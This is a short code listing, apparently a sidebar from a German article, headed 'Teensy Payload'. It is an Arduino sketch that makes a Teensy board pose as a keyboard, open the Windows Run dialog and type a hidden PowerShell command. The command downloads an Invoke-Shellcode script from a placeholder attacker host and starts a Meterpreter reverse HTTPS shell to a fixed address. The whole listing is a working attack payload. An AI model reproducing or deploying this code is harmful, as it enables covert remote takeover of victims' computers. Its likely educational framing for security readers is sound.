!!!!Listing-Kasten void setup() { delay(5000); // Start delay for initialization RunCommand("powershell -WindowStyle hidden -Command IEX (New-Object Net.WebClient).Download String('http://attacker-site.de/scripts/Invoke--Shellcode.ps1');Invoke-Shellcode -f -Payload windows/me terpreter/reverse_https -Lhost 192.168.0.100 -Lport 443"); } // Runs a command over Windows Runbar void RunCommand(char *command) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); //Windows key Keyboard.set_key1(KEY_R); Keyboard.send_now(); // Send keys to the system Keyboard.set_modifier(0); // Release the GUI (Windows) key Keyboard.set_key1(0); // No key Keyboard.send_now(); // Send the key change delay(500); Keyboard.print(command); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); delay(100); Keyboard.send_now(); } !!!Listing-Ende Kastenüberschrift: Teensy Payload